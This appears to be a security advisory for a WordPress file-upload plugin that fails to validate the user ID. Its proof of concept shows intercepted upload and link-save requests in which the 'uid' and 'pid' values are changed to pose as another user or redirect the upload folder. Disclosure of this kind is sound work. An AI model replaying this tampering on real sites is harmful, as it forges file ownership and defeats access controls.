Description The plugin is missing validation in its upload function, allowing a user to manipulate the user_id
to make it appear that a file was uploaded by another user
1. Select to upload a file through the plugin 2. Intercept the request: Example: \------WebKitFormBoundaryX4YnPgSA4oPHlNjv Content-Disposition: form-data; name="file[]"; filename="IMG_0628.PNG" Content-Type: image/png ... \------WebKitFormBoundaryX4YnPgSA4oPHlNjv Content-Disposition: form-data; name="action" sp_file_upload_callback \------WebKitFormBoundaryX4YnPgSA4oPHlNjv Content-Disposition: form-data; name="uid" 2(CHANGE HERE) \------WebKitFormBoundaryX4YnPgSA4oPHlNjv
Modify the 2(CHANGE HERE)
value and send the request. Modify the next request body changing 2(CHANGE HERE)
to any user ID: pid=2&action;=sp_cdm_link_save_embed&uid;=2(CHANGE HERE)&link-name;=link1&link-url;=http%3A%2F%2Flocalhost%3A8020%2Flink1&dlg-upload-notes;=aaa
Note: the upload directory can also be manipulated by changing the pid